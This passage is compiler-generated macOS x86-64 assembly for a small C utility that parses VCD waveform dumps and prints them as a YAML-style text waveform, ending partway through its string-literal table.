%bb.30: jmp LBB2_32 LBB2_31: leaq -144(%rbp), %rsi leaq L_.str.18(%rip), %rdi movb $0, %al callq _printf LBB2_32: jmp LBB2_33 LBB2_33: jmp LBB2_34 LBB2_34: jmp LBB2_35 LBB2_35: jmp LBB2_36 LBB2_36: jmp LBB2_37 LBB2_37: jmp LBB2_38 LBB2_38: jmp LBB2_39 LBB2_39: jmp LBB2_40 LBB2_40: jmp LBB2_41 LBB2_41: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB2_43 ## %bb.42: addq $480, %rsp ## imm = 0x1E0 popq %rbp retq LBB2_43: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _parseVcdTimestamp ## -- Begin function parseVcdTimestamp .p2align 4, 0x90 _parseVcdTimestamp: ## @parseVcdTimestamp .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rax cmpl $0, 61696(%rax) jbe LBB3_8 ## %bb.1: movq -8(%rbp), %rax movq %rax, -16(%rbp) LBB3_2: ## =>This Inner Loop Header: Depth=1 movq -16(%rbp), %rax movq -8(%rbp), %rcx addq $57600, %rcx ## imm = 0xE100 cmpq %rcx, %rax jae LBB3_7 ## %bb.3: ## in Loop: Header=BB3_2 Depth=1 movq -16(%rbp), %rax cmpl $0, (%rax) jne LBB3_5 ## %bb.4: ## in Loop: Header=BB3_2 Depth=1 jmp LBB3_6 LBB3_5: ## in Loop: Header=BB3_2 Depth=1 movq -16(%rbp), %rax movq 136(%rax), %rdi movq -8(%rbp), %rax movl 61696(%rax), %eax addl $1, %eax movl %eax, %eax movl %eax, %esi shlq $3, %rsi callq _realloc movq %rax, %rcx movq -16(%rbp), %rax movq %rcx, 136(%rax) movq -16(%rbp), %rax movq 136(%rax), %rax movq -8(%rbp), %rcx movl 61696(%rcx), %ecx ## kill: def $rcx killed $ecx movq -16(%rbp), %rdx movq 136(%rdx), %rdx movq -8(%rbp), %rsi movl 61696(%rsi), %esi subl $1, %esi movl %esi, %esi ## kill: def $rsi killed $esi movq (%rdx,%rsi,8), %rdx movq %rdx, (%rax,%rcx,8) LBB3_6: ## in Loop: Header=BB3_2 Depth=1 movq -16(%rbp), %rax addq $144, %rax movq %rax, -16(%rbp) jmp LBB3_2 LBB3_7: jmp LBB3_8 LBB3_8: leaq L_.str.19(%rip), %rdi leaq -24(%rbp), %rsi movb $0, %al callq _scanf movq -8(%rbp), %rax movl 61696(%rax), %ecx addl $1, %ecx movl %ecx, 61696(%rax) addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _parseVcdSample ## -- Begin function parseVcdSample .p2align 4, 0x90 _parseVcdSample: ## @parseVcdSample .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $192, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -152(%rbp) movl %esi, -156(%rbp) leaq -168(%rbp), %rdi xorl %esi, %esi movl $8, %edx callq _memset cmpl $98, -156(%rbp) jne LBB4_15 ## %bb.1: callq _getchar movl %eax, -156(%rbp) LBB4_2: ## =>This Inner Loop Header: Depth=1 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $-1, -156(%rbp) movb %al, -169(%rbp) ## 1-byte Spill je LBB4_4 ## %bb.3: ## in Loop: Header=BB4_2 Depth=1 cmpl $32, -156(%rbp) setne %al movb %al, -169(%rbp) ## 1-byte Spill LBB4_4: ## in Loop: Header=BB4_2 Depth=1 movb -169(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB4_5 jmp LBB4_14 LBB4_5: ## in Loop: Header=BB4_2 Depth=1 cmpl $48, -156(%rbp) je LBB4_7 ## %bb.6: ## in Loop: Header=BB4_2 Depth=1 cmpl $49, -156(%rbp) jne LBB4_8 LBB4_7: ## in Loop: Header=BB4_2 Depth=1 movl -164(%rbp), %eax shll $1, %eax movl -156(%rbp), %ecx subl $48, %ecx addl %ecx, %eax movl %eax, -164(%rbp) jmp LBB4_12 LBB4_8: ## in Loop: Header=BB4_2 Depth=1 movl -156(%rbp), %esi leaq L_.str.20(%rip), %rdi callq _strchr cmpq $0, %rax je LBB4_10 ## %bb.9: ## in Loop: Header=BB4_2 Depth=1 movl -156(%rbp), %eax ## kill: def $al killed $al killed $eax movb %al, -168(%rbp) jmp LBB4_11 LBB4_10: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi movl -156(%rbp), %edx leaq L_.str.21(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl %eax, %edi callq _exit LBB4_11: ## in Loop: Header=BB4_2 Depth=1 jmp LBB4_12 LBB4_12: ## in Loop: Header=BB4_2 Depth=1 jmp LBB4_13 LBB4_13: ## in Loop: Header=BB4_2 Depth=1 callq _getchar movl %eax, -156(%rbp) jmp LBB4_2 LBB4_14: jmp LBB4_22 LBB4_15: movl -156(%rbp), %edi callq _isalpha cmpl $0, %eax je LBB4_17 ## %bb.16: movl -156(%rbp), %eax movl %eax, -176(%rbp) ## 4-byte Spill jmp LBB4_18 LBB4_17: xorl %eax, %eax movl %eax, -176(%rbp) ## 4-byte Spill jmp LBB4_18 LBB4_18: movl -176(%rbp), %eax ## 4-byte Reload ## kill: def $al killed $al killed $eax movb %al, -168(%rbp) movl -156(%rbp), %edi callq _isdigit cmpl $0, %eax je LBB4_20 ## %bb.19: movl -156(%rbp), %eax subl $48, %eax movl %eax, -180(%rbp) ## 4-byte Spill jmp LBB4_21 LBB4_20: xorl %eax, %eax movl %eax, -180(%rbp) ## 4-byte Spill jmp LBB4_21 LBB4_21: movl -180(%rbp), %eax ## 4-byte Reload movl %eax, -164(%rbp) LBB4_22: leaq -144(%rbp), %rsi leaq L_.str.22(%rip), %rdi movb $0, %al callq _scanf movq -152(%rbp), %rax movq %rax, -192(%rbp) ## 8-byte Spill leaq -144(%rbp), %rdi callq _chanId movq %rax, %rcx movq -192(%rbp), %rax ## 8-byte Reload imulq $144, %rcx, %rcx addq %rcx, %rax movq 136(%rax), %rax movq -152(%rbp), %rcx movl 61696(%rcx), %ecx subl $1, %ecx movl %ecx, %ecx ## kill: def $rcx killed $ecx movq -168(%rbp), %rdx movq %rdx, (%rax,%rcx,8) movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB4_24 ## %bb.23: addq $192, %rsp popq %rbp retq LBB4_24: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _parseVcd ## -- Begin function parseVcd .p2align 4, 0x90 _parseVcd: ## @parseVcd .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) callq _getchar movl %eax, -12(%rbp) LBB5_1: ## =>This Inner Loop Header: Depth=1 cmpl $-1, -12(%rbp) je LBB5_15 ## %bb.2: ## in Loop: Header=BB5_1 Depth=1 movl -12(%rbp), %edi callq _isspace cmpl $0, %eax je LBB5_4 ## %bb.3: ## in Loop: Header=BB5_1 Depth=1 jmp LBB5_14 LBB5_4: ## in Loop: Header=BB5_1 Depth=1 cmpl $36, -12(%rbp) jne LBB5_6 ## %bb.5: ## in Loop: Header=BB5_1 Depth=1 movq -8(%rbp), %rdi callq _parseVcdInstruction jmp LBB5_13 LBB5_6: ## in Loop: Header=BB5_1 Depth=1 cmpl $35, -12(%rbp) jne LBB5_8 ## %bb.7: ## in Loop: Header=BB5_1 Depth=1 movq -8(%rbp), %rdi callq _parseVcdTimestamp jmp LBB5_12 LBB5_8: ## in Loop: Header=BB5_1 Depth=1 movl -12(%rbp), %esi leaq L_.str.20(%rip), %rdi callq _strchr cmpq $0, %rax je LBB5_10 ## %bb.9: ## in Loop: Header=BB5_1 Depth=1 movq -8(%rbp), %rdi movl -12(%rbp), %esi callq _parseVcdSample jmp LBB5_11 LBB5_10: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi movl -12(%rbp), %edx leaq L_.str.23(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl %eax, %edi callq _exit LBB5_11: ## in Loop: Header=BB5_1 Depth=1 jmp LBB5_12 LBB5_12: ## in Loop: Header=BB5_1 Depth=1 jmp LBB5_13 LBB5_13: ## in Loop: Header=BB5_1 Depth=1 jmp LBB5_14 LBB5_14: ## in Loop: Header=BB5_1 Depth=1 callq _getchar movl %eax, -12(%rbp) jmp LBB5_1 LBB5_15: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ## -- Begin function printYml LCPI6_0: .quad 0x4024000000000000 ## double 10 .section __TEXT,__text,regular,pure_instructions .globl _printYml .p2align 4, 0x90 _printYml: ## @printYml .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $128, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq -16(%rbp), %rax movq 16(%rax), %rdi callq _unilen cmpq $1, %rax je LBB6_2 ## %bb.1: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.24(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl %eax, %edi callq _exit LBB6_2: movq -16(%rbp), %rax movq (%rax), %rdi callq _unilen cmpq $1, %rax je LBB6_4 ## %bb.3: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.25(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl %eax, %edi callq _exit LBB6_4: movq -16(%rbp), %rax movq 24(%rax), %rdi callq _unilen cmpq $1, %rax jbe LBB6_6 ## %bb.5: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.26(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl %eax, %edi callq _exit LBB6_6: movq -16(%rbp), %rax movq 8(%rax), %rdi callq _unilen cmpq $1, %rax jbe LBB6_8 ## %bb.7: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.27(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl %eax, %edi callq _exit LBB6_8: movq -8(%rbp), %rax movl 62104(%rax), %eax addl $7, %eax shrl $2, %eax movl %eax, -20(%rbp) movq -16(%rbp), %rax movq 24(%rax), %rax movsbl (%rax), %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, %ecx movb %al, -61(%rbp) ## 1-byte Spill je LBB6_10 ## %bb.9: movq -16(%rbp), %rax movq 8(%rax), %rax movsbl (%rax), %eax cmpl $0, %eax setne %al movb %al, -61(%rbp) ## 1-byte Spill LBB6_10: movb -61(%rbp), %al ## 1-byte Reload andb $1, %al movzbl %al, %eax movl %eax, -24(%rbp) leaq L_.str.28(%rip), %rdi movb $0, %al callq _printf movl -20(%rbp), %esi leaq L_.str.29(%rip), %rdi movb $0, %al callq _printf movq -8(%rbp), %rsi addq $61708, %rsi ## imm = 0xF10C leaq L_.str.30(%rip), %rdi movb $0, %al callq _printf movq -8(%rbp), %rax movl 61696(%rax), %esi leaq L_.str.31(%rip), %rdi movb $0, %al callq _printf movq -16(%rbp), %rax movl 48(%rax), %esi leaq L_.str.32(%rip), %rdi movb $0, %al callq _printf leaq L_.str.33(%rip), %rdi movb $0, %al callq _printf movq -8(%rbp), %rax movss 61704(%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm0 leaq L_.str.34(%rip), %rdi movb $1, %al callq _printf movq -8(%rbp), %rax addq $61964, %rax ## imm = 0xF20C movq %rax, -72(%rbp) ## 8-byte Spill cmpq $0, %rax je LBB6_12 ## %bb.11: movq -72(%rbp), %rax ## 8-byte Reload movq %rax, -80(%rbp) ## 8-byte Spill jmp LBB6_13 LBB6_12: leaq L_.str.36(%rip), %rax movq %rax, -80(%rbp) ## 8-byte Spill jmp LBB6_13 LBB6_13: movq -80(%rbp), %rsi ## 8-byte Reload leaq L_.str.35(%rip), %rdi xorl %eax, %eax ## kill: def $al killed $al killed $eax movb %al, -81(%rbp) ## 1-byte Spill callq _printf ## kill: def $ecx killed $eax movb -81(%rbp), %al ## 1-byte Reload movq -8(%rbp), %rcx movl 62100(%rcx), %esi movq -16(%rbp), %rcx movq 32(%rcx), %rcx leaq L_.str.37(%rip), %rdi leaq L_.str.38(%rip), %rdx callq _printf movq -16(%rbp), %rax movl 48(%rax), %eax ## kill: def $rax killed $eax cvtsi2sd %rax, %xmm0 movsd %xmm0, -32(%rbp) LBB6_14: ## =>This Inner Loop Header: Depth=1 movsd -32(%rbp), %xmm1 ## xmm1 = mem[0],zero movq -8(%rbp), %rax movl 61696(%rax), %eax ## kill: def $rax killed $eax cvtsi2sd %rax, %xmm0 ucomisd %xmm1, %xmm0 jbe LBB6_17 ## %bb.15: ## in Loop: Header=BB6_14 Depth=1 imull $10, -20(%rbp), %esi subl $1, %esi movsd -32(%rbp), %xmm0 ## xmm0 = mem[0],zero movq -8(%rbp), %rax movss 61704(%rax), %xmm1 ## xmm1 = mem[0],zero,zero,zero cvtss2sd %xmm1, %xmm1 mulsd %xmm1, %xmm0 leaq L_.str.39(%rip), %rdi movb $1, %al callq _printf ## %bb.16: ## in Loop: Header=BB6_14 Depth=1 movsd LCPI6_0(%rip), %xmm0 ## xmm0 = mem[0],zero addsd -32(%rbp), %xmm0 movsd %xmm0, -32(%rbp) jmp LBB6_14 LBB6_17: movq -16(%rbp), %rax movq 40(%rax), %rsi leaq L_.str.40(%rip), %rdi movb $0, %al callq _printf movq -8(%rbp), %rax movq %rax, -40(%rbp) LBB6_18: ## =>This Loop Header: Depth=1 ## Child Loop BB6_28 Depth 2 ## Child Loop BB6_36 Depth 3 movq -40(%rbp), %rax movq -8(%rbp), %rcx subq %rcx, %rax movl $144, %ecx cqto idivq %rcx cmpq $400, %rax ## imm = 0x190 jae LBB6_58 ## %bb.19: ## in Loop: Header=BB6_18 Depth=1 movq -40(%rbp), %rax cmpl $0, (%rax) jne LBB6_21 ## %bb.20: ## in Loop: Header=BB6_18 Depth=1 jmp LBB6_57 LBB6_21: ## in Loop: Header=BB6_18 Depth=1 movq -40(%rbp), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax je LBB6_23 ## %bb.22: ## in Loop: Header=BB6_18 Depth=1 movq -40(%rbp), %rax movl 4(%rax), %eax movq -40(%rbp), %rcx cmpl -140(%rcx), %eax je LBB6_27 LBB6_23: ## in Loop: Header=BB6_18 Depth=1 movq -40(%rbp), %rax cmpl $0, 4(%rax) je LBB6_25 ## %bb.24: ## in Loop: Header=BB6_18 Depth=1 movq -8(%rbp), %rax addq $57600, %rax ## imm = 0xE100 movq -40(%rbp), %rcx movl 4(%rcx), %ecx ## kill: def $rcx killed $ecx shlq $7, %rcx addq %rcx, %rax movq %rax, -96(%rbp) ## 8-byte Spill jmp LBB6_26 LBB6_25: ## in Loop: Header=BB6_18 Depth=1 leaq L_.str.42(%rip), %rax movq %rax, -96(%rbp) ## 8-byte Spill jmp LBB6_26 LBB6_26: ## in Loop: Header=BB6_18 Depth=1 movq -96(%rbp), %rsi ## 8-byte Reload leaq L_.str.41(%rip), %rdi movb $0, %al callq _printf LBB6_27: ## in Loop: Header=BB6_18 Depth=1 movq -8(%rbp), %rax movl 62100(%rax), %esi movq -40(%rbp), %rdx addq $8, %rdx movq -16(%rbp), %rax movq 32(%rax), %rcx leaq L_.str.37(%rip), %rdi movb $0, %al callq _printf movq -40(%rbp), %rax movq 136(%rax), %rax movq -16(%rbp), %rcx movl 48(%rcx), %ecx ## kill: def $rcx killed $ecx shlq $3, %rcx addq %rcx, %rax movq %rax, -48(%rbp) LBB6_28: ## Parent Loop BB6_18 Depth=1 ## => This Loop Header: Depth=2 ## Child Loop BB6_36 Depth 3 movq -48(%rbp), %rax movq -40(%rbp), %rcx movq 136(%rcx), %rcx movq -8(%rbp), %rdx movl 61696(%rdx), %edx ## kill: def $rdx killed $edx shlq $3, %rdx addq %rdx, %rcx cmpq %rcx, %rax jae LBB6_56 ## %bb.29: ## in Loop: Header=BB6_28 Depth=2 movq -48(%rbp), %rax movq -40(%rbp), %rcx cmpq 136(%rcx), %rax jbe LBB6_31 ## %bb.30: ## in Loop: Header=BB6_28 Depth=2 movq -48(%rbp), %rax addq $-8, %rax movq %rax, -104(%rbp) ## 8-byte Spill jmp LBB6_32 LBB6_31: ## in Loop: Header=BB6_28 Depth=2 movq -48(%rbp), %rax movq %rax, -104(%rbp) ## 8-byte Spill LBB6_32: ## in Loop: Header=BB6_28 Depth=2 movq -104(%rbp), %rax ## 8-byte Reload movq %rax, -56(%rbp) movq -48(%rbp), %rax cmpb $0, (%rax) je LBB6_34 ## %bb.33: ## in Loop: Header=BB6_28 Depth=2 movl -20(%rbp), %esi movq -48(%rbp), %rax movsbl (%rax), %edx leaq L_.str.43(%rip), %rdi movb $0, %al callq _printf jmp LBB6_54 LBB6_34: ## in Loop: Header=BB6_28 Depth=2 movq -40(%rbp), %rax cmpl $1, (%rax) jne LBB6_52 ## %bb.35: ## in Loop: Header=BB6_28 Depth=2 movl $0, -60(%rbp) LBB6_36: ## Parent Loop BB6_18 Depth=1 ## Parent Loop BB6_28 Depth=2 ## => This Inner Loop Header: Depth=3 movl -60(%rbp), %eax cmpl -20(%rbp), %eax jge LBB6_51 ## %bb.37: ## in Loop: Header=BB6_36 Depth=3 cmpl $0, -60(%rbp) jne LBB6_45 ## %bb.38: ## in Loop: Header=BB6_36 Depth=3 cmpl $0, -24(%rbp) je LBB6_45 ## %bb.39: ## in Loop: Header=BB6_36 Depth=3 movq -48(%rbp), %rax movsbl (%rax), %eax movq -56(%rbp), %rcx movsbl (%rcx), %ecx cmpl %ecx, %eax jne LBB6_45 ## %bb.40: ## in Loop: Header=BB6_36 Depth=3 movq -48(%rbp), %rax movl 4(%rax), %eax movq -56(%rbp), %rcx cmpl 4(%rcx), %eax je LBB6_45 ## %bb.41: ## in Loop: Header=BB6_36 Depth=3 movq -56(%rbp), %rax cmpl $0, 4(%rax) je LBB6_43 ## %bb.42: ## in Loop: Header=BB6_36 Depth=3 movq -16(%rbp), %rax movq 24(%rax), %rax movq %rax, -112(%rbp) ## 8-byte Spill jmp LBB6_44 LBB6_43: ## in Loop: Header=BB6_36 Depth=3 movq -16(%rbp), %rax movq 8(%rax), %rax movq %rax, -112(%rbp) ## 8-byte Spill LBB6_44: ## in Loop: Header=BB6_36 Depth=3 movq -112(%rbp), %rsi ## 8-byte Reload leaq L_.str.44(%rip), %rdi movb $0, %al callq _printf jmp LBB6_49 LBB6_45: ## in Loop: Header=BB6_36 Depth=3 movq -48(%rbp), %rax cmpl $0, 4(%rax) je LBB6_47 ## %bb.46: ## in Loop: Header=BB6_36 Depth=3 movq -16(%rbp), %rax movq 16(%rax), %rax movq %rax, -120(%rbp) ## 8-byte Spill jmp LBB6_48 LBB6_47: ## in Loop: Header=BB6_36 Depth=3 movq -16(%rbp), %rax movq (%rax), %rax movq %rax, -120(%rbp) ## 8-byte Spill LBB6_48: ## in Loop: Header=BB6_36 Depth=3 movq -120(%rbp), %rsi ## 8-byte Reload leaq L_.str.44(%rip), %rdi movb $0, %al callq _printf LBB6_49: ## in Loop: Header=BB6_36 Depth=3 jmp LBB6_50 LBB6_50: ## in Loop: Header=BB6_36 Depth=3 movl -60(%rbp), %eax addl $1, %eax movl %eax, -60(%rbp) jmp LBB6_36 LBB6_51: ## in Loop: Header=BB6_28 Depth=2 jmp LBB6_53 LBB6_52: ## in Loop: Header=BB6_28 Depth=2 movl -20(%rbp), %esi movq -48(%rbp), %rax movl 4(%rax), %edx leaq L_.str.45(%rip), %rdi movb $0, %al callq _printf LBB6_53: ## in Loop: Header=BB6_28 Depth=2 jmp LBB6_54 LBB6_54: ## in Loop: Header=BB6_28 Depth=2 jmp LBB6_55 LBB6_55: ## in Loop: Header=BB6_28 Depth=2 movq -48(%rbp), %rax addq $8, %rax movq %rax, -48(%rbp) jmp LBB6_28 LBB6_56: ## in Loop: Header=BB6_18 Depth=1 movq -16(%rbp), %rax movq 40(%rax), %rsi leaq L_.str.46(%rip), %rdi movb $0, %al callq _printf LBB6_57: ## in Loop: Header=BB6_18 Depth=1 movq -40(%rbp), %rax addq $144, %rax movq %rax, -40(%rbp) jmp LBB6_18 LBB6_58: addq $128, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $62368, %eax ## imm = 0xF3A0 callq ____chkstk_darwin subq %rax, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -62124(%rbp) movl %edi, -62128(%rbp) movq %rsi, -62136(%rbp) leaq -62192(%rbp), %rax movq %rax, -62208(%rbp) ## 8-byte Spill leaq L_.str.47(%rip), %rdi callq _getenv movq %rax, -62200(%rbp) ## 8-byte Spill cmpq $0, %rax je LBB7_2 ## %bb.1: movq -62200(%rbp), %rax ## 8-byte Reload movq %rax, -62216(%rbp) ## 8-byte Spill jmp LBB7_3 LBB7_2: leaq L_.str.48(%rip), %rax movq %rax, -62216(%rbp) ## 8-byte Spill jmp LBB7_3 LBB7_3: movq -62208(%rbp), %rax ## 8-byte Reload movq -62216(%rbp), %rcx ## 8-byte Reload movq %rcx, (%rax) leaq -62192(%rbp), %rax addq $8, %rax movq %rax, -62232(%rbp) ## 8-byte Spill leaq L_.str.49(%rip), %rdi callq _getenv movq %rax, -62224(%rbp) ## 8-byte Spill cmpq $0, %rax je LBB7_5 ## %bb.4: movq -62224(%rbp), %rax ## 8-byte Reload movq %rax, -62240(%rbp) ## 8-byte Spill jmp LBB7_6 LBB7_5: leaq L_.str.50(%rip), %rax movq %rax, -62240(%rbp) ## 8-byte Spill jmp LBB7_6 LBB7_6: movq -62232(%rbp), %rax ## 8-byte Reload movq -62240(%rbp), %rcx ## 8-byte Reload movq %rcx, (%rax) leaq -62192(%rbp), %rax addq $16, %rax movq %rax, -62256(%rbp) ## 8-byte Spill leaq L_.str.51(%rip), %rdi callq _getenv movq %rax, -62248(%rbp) ## 8-byte Spill cmpq $0, %rax je LBB7_8 ## %bb.7: movq -62248(%rbp), %rax ## 8-byte Reload movq %rax, -62264(%rbp) ## 8-byte Spill jmp LBB7_9 LBB7_8: leaq L_.str.52(%rip), %rax movq %rax, -62264(%rbp) ## 8-byte Spill jmp LBB7_9 LBB7_9: movq -62256(%rbp), %rax ## 8-byte Reload movq -62264(%rbp), %rcx ## 8-byte Reload movq %rcx, (%rax) leaq -62192(%rbp), %rax addq $24, %rax movq %rax, -62280(%rbp) ## 8-byte Spill leaq L_.str.53(%rip), %rdi callq _getenv movq %rax, -62272(%rbp) ## 8-byte Spill cmpq $0, %rax je LBB7_11 ## %bb.10: movq -62272(%rbp), %rax ## 8-byte Reload movq %rax, -62288(%rbp) ## 8-byte Spill jmp LBB7_12 LBB7_11: leaq L_.str.54(%rip), %rax movq %rax, -62288(%rbp) ## 8-byte Spill jmp LBB7_12 LBB7_12: movq -62280(%rbp), %rax ## 8-byte Reload movq -62288(%rbp), %rcx ## 8-byte Reload movq %rcx, (%rax) leaq -62192(%rbp), %rax addq $32, %rax movq %rax, -62304(%rbp) ## 8-byte Spill leaq L_.str.55(%rip), %rdi callq _getenv movq %rax, -62296(%rbp) ## 8-byte Spill cmpq $0, %rax je LBB7_14 ## %bb.13: movq -62296(%rbp), %rax ## 8-byte Reload movq %rax, -62312(%rbp) ## 8-byte Spill jmp LBB7_15 LBB7_14: leaq L_.str.56(%rip), %rax movq %rax, -62312(%rbp) ## 8-byte Spill jmp LBB7_15 LBB7_15: movq -62304(%rbp), %rax ## 8-byte Reload movq -62312(%rbp), %rcx ## 8-byte Reload movq %rcx, (%rax) leaq -62192(%rbp), %rax addq $40, %rax movq %rax, -62328(%rbp) ## 8-byte Spill leaq L_.str.57(%rip), %rdi callq _getenv movq %rax, -62320(%rbp) ## 8-byte Spill cmpq $0, %rax je LBB7_17 ## %bb.16: movq -62320(%rbp), %rax ## 8-byte Reload movq %rax, -62336(%rbp) ## 8-byte Spill jmp LBB7_18 LBB7_17: leaq L_.str.56(%rip), %rax movq %rax, -62336(%rbp) ## 8-byte Spill jmp LBB7_18 LBB7_18: movq -62328(%rbp), %rax ## 8-byte Reload movq -62336(%rbp), %rcx ## 8-byte Reload movq %rcx, (%rax) leaq -62192(%rbp), %rax addq $48, %rax movq %rax, -62352(%rbp) ## 8-byte Spill leaq L_.str.58(%rip), %rdi callq _getenv movq %rax, -62344(%rbp) ## 8-byte Spill cmpq $0, %rax je LBB7_20 ## %bb.19: movq -62344(%rbp), %rax ## 8-byte Reload movq %rax, -62360(%rbp) ## 8-byte Spill jmp LBB7_21 LBB7_20: leaq L_.str.59(%rip), %rax movq %rax, -62360(%rbp) ## 8-byte Spill jmp LBB7_21 LBB7_21: movq -62360(%rbp), %rdi ## 8-byte Reload callq _atoi movl %eax, %ecx movq -62352(%rbp), %rax ## 8-byte Reload movl %ecx, (%rax) leaq -62120(%rbp), %rdi xorl %esi, %esi movl $62112, %edx ## imm = 0xF2A0 callq _memset leaq -62120(%rbp), %rdi callq _parseVcd leaq -62120(%rbp), %rdi leaq -62192(%rbp), %rsi callq _printYml movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB7_23 ## %bb.22: xorl %eax, %eax addq $62368, %rsp ## imm = 0xF3A0 popq %rbp retq LBB7_23: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Fatal error. Send your VCD at https://github.com/yne/vcd/issue\nReason: MAX_CHANNEL reached (400), rebuild with -DMAX_CHANNEL=...\n" L_.str.1: ## @.str.1 .asciz "%127s" L_.str.2: ## @.str.2 .asciz "var" L_.str.3: ## @.str.3 .asciz " %*s %d %127[^ ] %127[^$]" L_.str.4: ## @.str.4 .asciz "scope" L_.str.5: ## @.str.5 .asciz "Fatal error. Send your VCD at https://github.com/yne/vcd/issue\nReason: MAX_SCOPE reached (32), rebuild with -DMAX_SCOPE=...\n" L_.str.6: ## @.str.6 .asciz "%*s %127[^ $]" L_.str.7: ## @.str.7 .asciz "date" L_.str.8: ## @.str.8 .asciz "\n%127[^$\n]" L_.str.9: ## @.str.9 .asciz "version" L_.str.10: ## @.str.10 .asciz "timescale" L_.str.11: ## @.str.11 .asciz "\n%f%127[^$\n]" L_.str.12: ## @.str.12 .asciz "comment" L_.str.13: ## @.str.13 .asciz "\n%*[^$]" L_.str.14: ## @.str.14 .asciz "upscope" L_.str.15: ## @.str.15 .asciz "enddefinitions" L_.str.16: ## @.str.16 .asciz "dumpvars" L_.str.17: ## @.str.17 .asciz "end" L_.str.18: ## @.str.18 .asciz "unknow token : %s\n" L_.str.19: ## @.str.19 .asciz "%llu" L_.str.20: ## @.str.20 .asciz "0123456789zZxXbU-" L_.str.21: ## @.str.21 .asciz "Fatal error. Send your VCD at https://github.com/yne/vcd/issue\nReason: Unknown sample value: %c" L_.str.22: ## @.str.22 .asciz "%127[^ \n]" L_.str.23: ## @.str.23 .asciz "Fatal error. Send your VCD at https://github.com/yne/vcd/issue\nReason: unknow char : %c\n" L_.str.24: ## @.str.24 .asciz "Fatal error. Send your VCD at https://github.com/yne/vcd/issue\nReason: high waveform length must be 1" L_.str.25: ## @.str.25 .asciz "Fatal error. Send your VCD at https://github.com/yne/vcd/issue\nReason: low waveform length must be 1" L_.str.26: ## @.str.26 .asciz "Fatal error. Send your VCD at https://github.com/yne/vcd/issue\nReason: drown waveform length must be 1 or empty" L_.str.27: ## @.str.27 .asciz "Fatal error. Send your VCD at https://github.com/yne/vcd/issue\nReason: raise waveform length must be 1 or empty" L_.str.28: ## @.str.28 .asciz "global:\n" L_.str.29: ## @.str.29 .asciz " zoom: %i\n" L_.str.30: ## @.str.30 .asciz " date: %s\n" L_.str.31: ## @.str.31 .asciz " total: %i\n" L_.str.32: ## @.str.32 .asciz " skip: %i\n" L_.str.33: ## @.str.33 .asciz " time:\n" L_.str.34: ## @.str.34 .asciz " scale: %.2f\n" L_.str.35: ## @.str.35 .asciz " unit: %s\n" L_.str.36: ## @.str.36 .asciz "?" L_.str.37: ## @.str.37 .asciz " %-*s: %s" L_.str.38: ## @.str.38 .asciz "line" L_.str.39: ## @.str.39 .asciz "%-*g " L_.str.40: ## @.str.40 .asciz "%s\nchannels:\n" L_.str.41: ## @.str.41 .asciz " %s:\n" L_.str.42: ## @.str.42 .asciz "default" L_.str.43: ## @.str.43 .asciz "%-*c" L_.str.44: ## @.str.44 .asciz "%s" L_.str.45: ## @.str.45 .asciz "%-*X" L_.str.46: ## @.str.46 .asciz "%s\n" L_.str.47: ## @.str.47 .asciz "LOW" L_.str.48: ## @.str.48 .asciz "\342\226\201" L_.str.49: ## @.str.49 .asciz "RAISE" L_.str.50: ## @.str.50 .asciz "\342\225\261" L_.str.51: ## 